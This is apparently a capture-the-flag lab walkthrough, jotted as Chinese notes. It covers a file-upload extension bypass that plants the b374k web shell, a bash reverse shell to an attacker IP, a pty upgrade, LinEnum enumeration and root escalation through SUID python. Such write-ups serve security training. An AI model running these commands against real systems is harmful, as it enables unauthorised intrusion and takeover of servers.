nmap -A 10.10.233.205
python3 dirsearch.py -u http://10.10.233.205/ -e all
/panel/
/uploads/
/panel/ 可以上傳檔案
b374k.php
PHP是不允許的! (葡萄牙文)b374k.php.aaa
文件上傳成功!
Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
b374k 就能進入 shellnc -vlk 7877
bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
LinEnum.sh
chmod +x LinEnum.sh
LinEnum 並順便輸出到檔案
./LinEnum.sh | tee meow.txt
/usr/bin/python 有 SUIDpython -c 'import os; os.execl("/bin/sh", "sh", "-p")'